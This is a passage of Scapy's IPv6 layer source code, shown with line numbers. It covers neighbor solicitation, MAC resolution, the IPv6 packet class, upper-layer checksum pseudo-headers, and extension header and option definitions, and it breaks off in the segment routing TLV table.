• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28    DLT_IPV6,
29    DLT_RAW,
30    DLT_RAW_ALT,
31    ETHER_ANY,
32    ETH_P_ALL,
33    ETH_P_IPV6,
34    MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38    BitEnumField,
39    BitField,
40    ByteEnumField,
41    ByteField,
42    DestIP6Field,
43    FieldLenField,
44    FlagsField,
45    IntField,
46    IP6Field,
47    LongField,
48    MACField,
49    MayEnd,
50    PacketLenField,
51    PacketListField,
52    ShortEnumField,
53    ShortField,
54    SourceIP6Field,
55    StrField,
56    StrFixedLenField,
57    StrLenField,
58    X3BytesField,
59    XBitField,
60    XByteField,
61    XIntField,
62    XShortField,
63)
64from scapy.layers.inet import (
65    _ICMPExtensionField,
66    _ICMPExtensionPadField,
67    _ICMP_extpad_post_dissection,
68    IP,
69    IPTools,
70    TCP,
71    TCPerror,
72    TracerouteResult,
73    UDP,
74    UDPerror,
75)
76from scapy.layers.l2 import (
77    CookedLinux,
78    Ether,
79    GRE,
80    Loopback,
81    SNAP,
82    SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90    in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91    in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
93
94# Typing
95from typing import (
96    Optional,
97)
98
99if not socket.has_ipv6:
100    raise socket.error("can't use AF_INET6, IPv6 is disabled")
101if not hasattr(socket, "IPPROTO_IPV6"):
102    # Workaround for http://bugs.python.org/issue6926
103    socket.IPPROTO_IPV6 = 41
104if not hasattr(socket, "IPPROTO_IPIP"):
105    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
106    socket.IPPROTO_IPIP = 4
107
108if conf.route6 is None:
109    # unused import, only to initialize conf.route6
110    import scapy.route6  # noqa: F401
111
112##########################
113#  Neighbor cache stuff  #
114##########################
115
116conf.netcache.new_cache("in6_neighbor", 120)
117
118
119@conf.commands.register
120def neighsol(addr, src, iface, timeout=1, chainCC=0):
121    """Sends and receive an ICMPv6 Neighbor Solicitation message
122
123    This function sends an ICMPv6 Neighbor Solicitation message
124    to get the MAC address of the neighbor with specified IPv6 address address.
125
126    'src' address is used as the source IPv6 address of the message. Message
127    is sent on 'iface'. The source MAC address is retrieved accordingly.
128
129    By default, timeout waiting for an answer is 1 second.
130
131    If no answer is gathered, None is returned. Else, the answer is
132    returned (ethernet frame).
133    """
134
135    nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
136    d = inet_ntop(socket.AF_INET6, nsma)
137    dm = in6_getnsmac(nsma)
138    sm = get_if_hwaddr(iface)
139    p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255)
140    p /= ICMPv6ND_NS(tgt=addr)
141    p /= ICMPv6NDOptSrcLLAddr(lladdr=sm)
142    res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
143               chainCC=chainCC)
144
145    return res
146
147
148@conf.commands.register
149def getmacbyip6(ip6, chainCC=0):
150    # type: (str, int) -> Optional[str]
151    """
152    Returns the MAC address of the next hop used to reach a given IPv6 address.
153
154    neighborCache.get() method is used on instantiated neighbor cache.
155    Resolution mechanism is described in associated doc string.
156
157    (chainCC parameter value ends up being passed to sending function
158     used to perform the resolution, if needed)
159
160    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
161    """
162    # Sanitize the IP
163    if isinstance(ip6, Net6):
164        ip6 = str(ip6)
165
166    # Multicast
167    if in6_ismaddr(ip6):  # mcast @
168        mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
169        return mac
170
171    iff, a, nh = conf.route6.route(ip6)
172
173    if iff == conf.loopback_name:
174        return "ff:ff:ff:ff:ff:ff"
175
176    if nh != '::':
177        ip6 = nh  # Found next hop
178
179    mac = conf.netcache.in6_neighbor.get(ip6)
180    if mac:
181        return mac
182
183    res = neighsol(ip6, a, iff, chainCC=chainCC)
184
185    if res is not None:
186        if ICMPv6NDOptDstLLAddr in res:
187            mac = res[ICMPv6NDOptDstLLAddr].lladdr
188        else:
189            mac = res.src
190        conf.netcache.in6_neighbor[ip6] = mac
191        return mac
192
193    return None
194
195
196#############################################################################
197#############################################################################
198#                                IPv6 Class                                 #
199#############################################################################
200#############################################################################
201
202ipv6nh = {0: "Hop-by-Hop Option Header",
203          4: "IP",
204          6: "TCP",
205          17: "UDP",
206          41: "IPv6",
207          43: "Routing Header",
208          44: "Fragment Header",
209          47: "GRE",
210          50: "ESP Header",
211          51: "AH Header",
212          58: "ICMPv6",
213          59: "No Next Header",
214          60: "Destination Option Header",
215          112: "VRRP",
216          132: "SCTP",
217          135: "Mobility Header"}
218
219ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
220             4: "IP",
221             6: "TCP",
222             17: "UDP",
223             43: "IPv6ExtHdrRouting",
224             44: "IPv6ExtHdrFragment",
225             50: "ESP",
226             51: "AH",
227             58: "ICMPv6Unknown",
228             59: "Raw",
229             60: "IPv6ExtHdrDestOpt"}
230
231
232class IP6ListField(StrField):
233    __slots__ = ["count_from", "length_from"]
234    islist = 1
235
236    def __init__(self, name, default, count_from=None, length_from=None):
237        if default is None:
238            default = []
239        StrField.__init__(self, name, default)
240        self.count_from = count_from
241        self.length_from = length_from
242
243    def i2len(self, pkt, i):
244        return 16 * len(i)
245
246    def i2count(self, pkt, i):
247        if isinstance(i, list):
248            return len(i)
249        return 0
250
251    def getfield(self, pkt, s):
252        c = tmp_len = None
253        if self.length_from is not None:
254            tmp_len = self.length_from(pkt)
255        elif self.count_from is not None:
256            c = self.count_from(pkt)
257
258        lst = []
259        ret = b""
260        remain = s
261        if tmp_len is not None:
262            remain, ret = s[:tmp_len], s[tmp_len:]
263        while remain:
264            if c is not None:
265                if c <= 0:
266                    break
267                c -= 1
268            addr = inet_ntop(socket.AF_INET6, remain[:16])
269            lst.append(addr)
270            remain = remain[16:]
271        return remain + ret, lst
272
273    def i2m(self, pkt, x):
274        s = b""
275        for y in x:
276            try:
277                y = inet_pton(socket.AF_INET6, y)
278            except Exception:
279                y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
280                y = inet_pton(socket.AF_INET6, y)
281            s += y
282        return s
283
284    def i2repr(self, pkt, x):
285        s = []
286        if x is None:
287            return "[]"
288        for y in x:
289            s.append('%s' % y)
290        return "[ %s ]" % (", ".join(s))
291
292
293class _IPv6GuessPayload:
294    name = "Dummy class that implements guess_payload_class() for IPv6"
295
296    def default_payload_class(self, p):
297        if self.nh == 58:  # ICMPv6
298            t = orb(p[0])
299            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
300                return _niquery_guesser(p)
301            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
302                if t == 130 and len(p) >= 28:
303                    # RFC 3810 - 8.1. Query Version Distinctions
304                    return ICMPv6MLQuery2
305                return icmp6typescls.get(t, Raw)
306            return Raw
307        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
308            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
309        elif self.nh == 43 and orb(p[2]) == 4:  # Segment Routing header
310            return IPv6ExtHdrSegmentRouting
311        return ipv6nhcls.get(self.nh, Raw)
312
313
314class IPv6(_IPv6GuessPayload, Packet, IPTools):
315    name = "IPv6"
316    fields_desc = [BitField("version", 6, 4),
317                   BitField("tc", 0, 8),
318                   BitField("fl", 0, 20),
319                   ShortField("plen", None),
320                   ByteEnumField("nh", 59, ipv6nh),
321                   ByteField("hlim", 64),
322                   SourceIP6Field("src"),
323                   DestIP6Field("dst", "::1")]
324
325    def route(self):
326        """Used to select the L2 address"""
327        dst = self.dst
328        scope = None
329        if isinstance(dst, (Net6, _ScopedIP)):
330            scope = dst.scope
331        if isinstance(dst, (Gen, list)):
332            dst = next(iter(dst))
333        return conf.route6.route(dst, dev=scope)
334
335    def mysummary(self):
336        return "%s > %s (%i)" % (self.src, self.dst, self.nh)
337
338    def post_build(self, p, pay):
339        p += pay
340        if self.plen is None:
341            tmp_len = len(p) - 40
342            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
343        return p
344
345    def extract_padding(self, data):
346        """Extract the IPv6 payload"""
347
348        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
349            # Extract Hop-by-Hop extension length
350            hbh_len = orb(data[1])
351            hbh_len = 8 + hbh_len * 8
352
353            # Extract length from the Jumbogram option
354            # Note: the following algorithm take advantage of the Jumbo option
355            #        mandatory alignment (4n + 2, RFC2675 Section 2)
356            jumbo_len = None
357            idx = 0
358            offset = 4 * idx + 2
359            while offset <= len(data):
360                opt_type = orb(data[offset])
361                if opt_type == 0xc2:  # Jumbo option
362                    jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0]  # noqa: E501
363                    break
364                offset = 4 * idx + 2
365                idx += 1
366
367            if jumbo_len is None:
368                log_runtime.info("Scapy did not find a Jumbo option")
369                jumbo_len = 0
370
371            tmp_len = hbh_len + jumbo_len
372        else:
373            tmp_len = self.plen
374
375        return data[:tmp_len], data[tmp_len:]
376
377    def hashret(self):
378        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
379            if self.payload.type < 128:
380                return self.payload.payload.hashret()
381            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
382                return struct.pack("B", self.nh) + self.payload.hashret()
383
384        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
385            return self.payload.hashret()
386
387        nh = self.nh
388        sd = self.dst
389        ss = self.src
390        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
391            # With routing header, the destination is the last
392            # address of the IPv6 list if segleft > 0
393            nh = self.payload.nh
394            try:
395                sd = self.addresses[-1]
396            except IndexError:
397                sd = '::1'
398            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
399            #       could be anything from the original list ...
400            if 1:
401                sd = inet_pton(socket.AF_INET6, sd)
402                for a in self.addresses:
403                    a = inet_pton(socket.AF_INET6, a)
404                    sd = strxor(sd, a)
405                sd = inet_ntop(socket.AF_INET6, sd)
406
407        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
408            # With segment routing header (rh == 4), the destination is
409            # the first address of the IPv6 addresses list
410            try:
411                sd = self.addresses[0]
412            except IndexError:
413                sd = self.dst
414
415        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
416            nh = self.payload.nh
417
418        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
419            nh = self.payload.nh
420
421        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
422            foundhao = None
423            for o in self.payload.options:
424                if isinstance(o, HAO):
425                    foundhao = o
426            if foundhao:
427                ss = foundhao.hoa
428            nh = self.payload.nh  # XXX what if another extension follows ?
429
430        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
431            sd = inet_pton(socket.AF_INET6, sd)
432            ss = inet_pton(socket.AF_INET6, ss)
433            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
434        else:
435            return struct.pack("B", nh) + self.payload.hashret()
436
437    def answers(self, other):
438        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
439            if self.nh in [4, 41]:
440                return self.payload.answers(other)
441            if isinstance(other, IPv6) and other.nh in [4, 41]:
442                return self.answers(other.payload)
443            if isinstance(other, IP) and other.proto in [4, 41]:
444                return self.answers(other.payload)
445        if not isinstance(other, IPv6):  # self is reply, other is request
446            return False
447        if conf.checkIPaddr:
448            # ss = inet_pton(socket.AF_INET6, self.src)
449            sd = inet_pton(socket.AF_INET6, self.dst)
450            os = inet_pton(socket.AF_INET6, other.src)
451            od = inet_pton(socket.AF_INET6, other.dst)
452            # request was sent to a multicast address (other.dst)
453            # Check reply destination addr matches request source addr (i.e
454            # sd == os) except when reply is multicasted too
455            # XXX test mcast scope matching ?
456            if in6_ismaddr(other.dst):
457                if in6_ismaddr(self.dst):
458                    if ((od == sd) or
459                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
460                        return self.payload.answers(other.payload)
461                    return False
462                if (os == sd):
463                    return self.payload.answers(other.payload)
464                return False
465            elif (sd != os):  # or ss != od): <- removed for ICMP errors
466                return False
467        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
468            # ICMPv6 Error message -> generated by IPv6 packet
469            # Note : at the moment, we jump the ICMPv6 specific class
470            # to call answers() method of erroneous packet (over
471            # initial packet). There can be cases where an ICMPv6 error
472            # class could implement a specific answers method that perform
473            # a specific task. Currently, don't see any use ...
474            return self.payload.payload.answers(other)
475        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
476            return self.payload.answers(other.payload)
477        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
478            return self.payload.answers(other.payload.payload)
479        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
480            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
481        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
482            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
483        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
484            return self.payload.answers(other.payload.payload)
485        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
486            return self.payload.payload.answers(other.payload)
487        else:
488            if (self.nh != other.nh):
489                return False
490            return self.payload.answers(other.payload)
491
492
493class IPv46(IP, IPv6):
494    """
495    This class implements a dispatcher that is used to detect the IP version
496    while parsing Raw IP pcap files.
497    """
498    name = "IPv4/6"
499
500    @classmethod
501    def dispatch_hook(cls, _pkt=None, *_, **kargs):
502        if _pkt:
503            if orb(_pkt[0]) >> 4 == 6:
504                return IPv6
505        elif kargs.get("version") == 6:
506            return IPv6
507        return IP
508
509
510def inet6_register_l3(l2, l3):
511    """
512    Resolves the default L2 destination address when IPv6 is used.
513    """
514    return getmacbyip6(l3.dst)
515
516
517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
518
519
520class IPerror6(IPv6):
521    name = "IPv6 in ICMPv6"
522
523    def answers(self, other):
524        if not isinstance(other, IPv6):
525            return False
526        sd = inet_pton(socket.AF_INET6, self.dst)
527        ss = inet_pton(socket.AF_INET6, self.src)
528        od = inet_pton(socket.AF_INET6, other.dst)
529        os = inet_pton(socket.AF_INET6, other.src)
530
531        # Make sure that the ICMPv6 error is related to the packet scapy sent
532        if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
533
534            # find upper layer for self (possible citation)
535            selfup = self.payload
536            while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
537                selfup = selfup.payload
538
539            # find upper layer for other (initial packet). Also look for RH
540            otherup = other.payload
541            request_has_rh = False
542            while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
543                if isinstance(otherup, IPv6ExtHdrRouting):
544                    request_has_rh = True
545                otherup = otherup.payload
546
547            if ((ss == os and sd == od) or  # < Basic case
548                    (ss == os and request_has_rh)):
549                # ^ Request has a RH : don't check dst address
550
551                # Let's deal with possible MSS Clamping
552                if (isinstance(selfup, TCP) and
553                    isinstance(otherup, TCP) and
554                        selfup.options != otherup.options):  # seems clamped
555
556                    # Save fields modified by MSS clamping
557                    old_otherup_opts = otherup.options
558                    old_otherup_cksum = otherup.chksum
559                    old_otherup_dataofs = otherup.dataofs
560                    old_selfup_opts = selfup.options
561                    old_selfup_cksum = selfup.chksum
562                    old_selfup_dataofs = selfup.dataofs
563
564                    # Nullify them
565                    otherup.options = []
566                    otherup.chksum = 0
567                    otherup.dataofs = 0
568                    selfup.options = []
569                    selfup.chksum = 0
570                    selfup.dataofs = 0
571
572                    # Test it and save result
573                    s1 = raw(selfup)
574                    s2 = raw(otherup)
575                    tmp_len = min(len(s1), len(s2))
576                    res = s1[:tmp_len] == s2[:tmp_len]
577
578                    # recall saved values
579                    otherup.options = old_otherup_opts
580                    otherup.chksum = old_otherup_cksum
581                    otherup.dataofs = old_otherup_dataofs
582                    selfup.options = old_selfup_opts
583                    selfup.chksum = old_selfup_cksum
584                    selfup.dataofs = old_selfup_dataofs
585
586                    return res
587
588                s1 = raw(selfup)
589                s2 = raw(otherup)
590                tmp_len = min(len(s1), len(s2))
591                return s1[:tmp_len] == s2[:tmp_len]
592
593        return False
594
595    def mysummary(self):
596        return Packet.mysummary(self)
597
598
599#############################################################################
600#############################################################################
601#                 Upper Layer Checksum computation                          #
602#############################################################################
603#############################################################################
604
605class PseudoIPv6(Packet):  # IPv6 Pseudo-header for checksum computation
606    name = "Pseudo IPv6 Header"
607    fields_desc = [IP6Field("src", "::"),
608                   IP6Field("dst", "::"),
609                   IntField("uplen", None),
610                   BitField("zero", 0, 24),
611                   ByteField("nh", 0)]
612
613
614def in6_pseudoheader(nh, u, plen):
615    # type: (int, IP, int) -> PseudoIPv6
616    """
617    Build an PseudoIPv6 instance as specified in RFC 2460 8.1
618
619    This function operates by filling a pseudo header class instance
620    (PseudoIPv6) with:
621    - Next Header value
622    - the address of _final_ destination (if some Routing Header with non
623    segleft field is present in underlayer classes, last address is used.)
624    - the address of _real_ source (basically the source address of an
625    IPv6 class instance available in the underlayer or the source address
626    in HAO option if some Destination Option header found in underlayer
627    includes this option).
628    - the length is the length of provided payload string ('p')
629
630    :param nh: value of upper layer protocol
631    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
632        provided with all under layers (IPv6 and all extension headers,
633        for example)
634    :param plen: the length of the upper layer and payload
635    """
636    ph6 = PseudoIPv6()
637    ph6.nh = nh
638    rthdr = 0
639    hahdr = 0
640    final_dest_addr_found = 0
641    while u is not None and not isinstance(u, IPv6):
642        if (isinstance(u, IPv6ExtHdrRouting) and
643            u.segleft != 0 and len(u.addresses) != 0 and
644                final_dest_addr_found == 0):
645            rthdr = u.addresses[-1]
646            final_dest_addr_found = 1
647        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
648              u.segleft != 0 and len(u.addresses) != 0 and
649              final_dest_addr_found == 0):
650            rthdr = u.addresses[0]
651            final_dest_addr_found = 1
652        elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
653              isinstance(u.options[0], HAO)):
654            hahdr = u.options[0].hoa
655        u = u.underlayer
656    if u is None:
657        warning("No IPv6 underlayer to compute checksum. Leaving null.")
658        return None
659    if hahdr:
660        ph6.src = hahdr
661    else:
662        ph6.src = u.src
663    if rthdr:
664        ph6.dst = rthdr
665    else:
666        ph6.dst = u.dst
667    ph6.uplen = plen
668    return ph6
669
670
671def in6_chksum(nh, u, p):
672    """
673    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
674
675    See also `.in6_pseudoheader`
676
677    :param nh: value of upper layer protocol
678    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
679        provided with all under layers (IPv6 and all extension headers,
680        for example)
681    :param p: the payload of the upper layer provided as a string
682    """
683    ph6 = in6_pseudoheader(nh, u, len(p))
684    if ph6 is None:
685        return 0
686    ph6s = raw(ph6)
687    return checksum(ph6s + p)
688
689
690#############################################################################
691#############################################################################
692#                           Extension Headers                               #
693#############################################################################
694#############################################################################
695
696
697# Inherited by all extension header classes
698class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
699    name = 'Abstract IPv6 Option Header'
700    aliastypes = [IPv6, IPerror6]  # TODO ...
701
702
703#                    IPv6 options for Extension Headers                     #
704
705_hbhopts = {0x00: "Pad1",
706            0x01: "PadN",
707            0x04: "Tunnel Encapsulation Limit",
708            0x05: "Router Alert",
709            0x06: "Quick-Start",
710            0xc2: "Jumbo Payload",
711            0xc9: "Home Address Option"}
712
713
714class _OTypeField(ByteEnumField):
715    """
716    Modified BytEnumField that displays information regarding the IPv6 option
717    based on its option type value (What should be done by nodes that process
718    the option if they do not understand it ...)
719
720    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
721    """
722    pol = {0x00: "00: skip",
723           0x40: "01: discard",
724           0x80: "10: discard+ICMP",
725           0xC0: "11: discard+ICMP not mcast"}
726
727    enroutechange = {0x00: "0: Don't change en-route",
728                     0x20: "1: May change en-route"}
729
730    def i2repr(self, pkt, x):
731        s = self.i2s.get(x, repr(x))
732        polstr = self.pol[(x & 0xC0)]
733        enroutechangestr = self.enroutechange[(x & 0x20)]
734        return "%s [%s, %s]" % (s, polstr, enroutechangestr)
735
736
737class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
738    name = "Scapy6 Unknown Option"
739    fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
740                   FieldLenField("optlen", None, length_of="optdata", fmt="B"),
741                   StrLenField("optdata", "",
742                               length_from=lambda pkt: pkt.optlen)]
743
744    def alignment_delta(self, curpos):  # By default, no alignment requirement
745        """
746        As specified in section 4.2 of RFC 2460, every options has
747        an alignment requirement usually expressed xn+y, meaning
748        the Option Type must appear at an integer multiple of x octets
749        from the start of the header, plus y octets.
750
751        That function is provided the current position from the
752        start of the header and returns required padding length.
753        """
754        return 0
755
756    @classmethod
757    def dispatch_hook(cls, _pkt=None, *args, **kargs):
758        if _pkt:
759            o = orb(_pkt[0])  # Option type
760            if o in _hbhoptcls:
761                return _hbhoptcls[o]
762        return cls
763
764    def extract_padding(self, p):
765        return b"", p
766
767
768class Pad1(Packet):  # IPv6 Hop-By-Hop Option
769    name = "Pad1"
770    fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
771
772    def alignment_delta(self, curpos):  # No alignment requirement
773        return 0
774
775    def extract_padding(self, p):
776        return b"", p
777
778
779class PadN(Packet):  # IPv6 Hop-By-Hop Option
780    name = "PadN"
781    fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
782                   FieldLenField("optlen", None, length_of="optdata", fmt="B"),
783                   StrLenField("optdata", "",
784                               length_from=lambda pkt: pkt.optlen)]
785
786    def alignment_delta(self, curpos):  # No alignment requirement
787        return 0
788
789    def extract_padding(self, p):
790        return b"", p
791
792
793class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
794    name = "Router Alert"
795    fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
796                   ByteField("optlen", 2),
797                   ShortEnumField("value", None,
798                                  {0: "Datagram contains a MLD message",
799                                   1: "Datagram contains RSVP message",
800                                   2: "Datagram contains an Active Network message",  # noqa: E501
801                                   68: "NSIS NATFW NSLP",
802                                   69: "MPLS OAM",
803                                   65535: "Reserved"})]
804    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
805    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
806    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
807    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
808
809    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
810        x = 2
811        y = 0
812        delta = x * ((curpos - y + x - 1) // x) + y - curpos
813        return delta
814
815    def extract_padding(self, p):
816        return b"", p
817
818
819class RplOption(Packet):    # RFC 6553 - RPL Option
820    name = "RPL Option"
821    fields_desc = [_OTypeField("otype", 0x63, _hbhopts),
822                   ByteField("optlen", 4),
823                   BitField("Down", 0, 1),
824                   BitField("RankError", 0, 1),
825                   BitField("ForwardError", 0, 1),
826                   BitField("unused", 0, 5),
827                   XByteField("RplInstanceId", 0),
828                   XShortField("SenderRank", 0)]
829
830    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
831        x = 2
832        y = 0
833        delta = x * ((curpos - y + x - 1) // x) + y - curpos
834        return delta
835
836    def extract_padding(self, p):
837        return b"", p
838
839
840class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
841    name = "Jumbo Payload"
842    fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
843                   ByteField("optlen", 4),
844                   IntField("jumboplen", None)]
845
846    def alignment_delta(self, curpos):  # alignment requirement : 4n+2
847        x = 4
848        y = 2
849        delta = x * ((curpos - y + x - 1) // x) + y - curpos
850        return delta
851
852    def extract_padding(self, p):
853        return b"", p
854
855
856class HAO(Packet):  # IPv6 Destination Options Header Option
857    name = "Home Address Option"
858    fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
859                   ByteField("optlen", 16),
860                   IP6Field("hoa", "::")]
861
862    def alignment_delta(self, curpos):  # alignment requirement : 8n+6
863        x = 8
864        y = 6
865        delta = x * ((curpos - y + x - 1) // x) + y - curpos
866        return delta
867
868    def extract_padding(self, p):
869        return b"", p
870
871
872_hbhoptcls = {0x00: Pad1,
873              0x01: PadN,
874              0x05: RouterAlert,
875              0x63: RplOption,
876              0xC2: Jumbo,
877              0xC9: HAO}
878
879
880#                         Hop-by-Hop Extension Header                       #
881
882class _OptionsField(PacketListField):
883    __slots__ = ["curpos"]
884
885    def __init__(self, name, default, cls, curpos, *args, **kargs):
886        self.curpos = curpos
887        PacketListField.__init__(self, name, default, cls, *args, **kargs)
888
889    def i2len(self, pkt, i):
890        return len(self.i2m(pkt, i))
891
892    def i2m(self, pkt, x):
893        autopad = None
894        try:
895            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
896        except Exception:
897            autopad = 1
898
899        if not autopad:
900            return b"".join(map(bytes, x))
901
902        curpos = self.curpos
903        s = b""
904        for p in x:
905            d = p.alignment_delta(curpos)
906            curpos += d
907            if d == 1:
908                s += raw(Pad1())
909            elif d != 0:
910                s += raw(PadN(optdata=b'\x00' * (d - 2)))
911            pstr = raw(p)
912            curpos += len(pstr)
913            s += pstr
914
915        # Let's make the class including our option field
916        # a multiple of 8 octets long
917        d = curpos % 8
918        if d == 0:
919            return s
920        d = 8 - d
921        if d == 1:
922            s += raw(Pad1())
923        elif d != 0:
924            s += raw(PadN(optdata=b'\x00' * (d - 2)))
925
926        return s
927
928    def addfield(self, pkt, s, val):
929        return s + self.i2m(pkt, val)
930
931
932class _PhantomAutoPadField(ByteField):
933    def addfield(self, pkt, s, val):
934        return s
935
936    def getfield(self, pkt, s):
937        return s, 1
938
939    def i2repr(self, pkt, x):
940        if x:
941            return "On"
942        return "Off"
943
944
945class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
946    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
947    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
948                   FieldLenField("len", None, length_of="options", fmt="B",
949                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
950                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
951                   _OptionsField("options", [], HBHOptUnknown, 2,
952                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
953    overload_fields = {IPv6: {"nh": 0}}
954
955
956#                        Destination Option Header                          #
957
958class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
959    name = "IPv6 Extension Header - Destination Options Header"
960    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
961                   FieldLenField("len", None, length_of="options", fmt="B",
962                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
963                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
964                   _OptionsField("options", [], HBHOptUnknown, 2,
965                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
966    overload_fields = {IPv6: {"nh": 60}}
967
968
969#                             Routing Header                                #
970
971class IPv6ExtHdrRouting(_IPv6ExtHdr):
972    name = "IPv6 Option Header Routing"
973    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
974                   FieldLenField("len", None, count_of="addresses", fmt="B",
975                                 adjust=lambda pkt, x:2 * x),  # in 8 bytes blocks  # noqa: E501
976                   ByteField("type", 0),
977                   ByteField("segleft", None),
978                   BitField("reserved", 0, 32),  # There is meaning in this field ...  # noqa: E501
979                   IP6ListField("addresses", [],
980                                length_from=lambda pkt: 8 * pkt.len)]
981    overload_fields = {IPv6: {"nh": 43}}
982
983    def post_build(self, pkt, pay):
984        if self.segleft is None:
985            pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
986        return _IPv6ExtHdr.post_build(self, pkt, pay)
987
988
989#                         Segment Routing Header                            #
990
991# This implementation is based on RFC8754, but some older snippets come from:
992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
993
994_segment_routing_header_tlvs = {
995    # RFC 8754 sect 8.2
996    0: "Pad1 TLV",
997    1: "Ingress Node TLV",  # draft 06
998    2: "Egress Node TLV",  # draft 06
999    4: "PadN TLV",
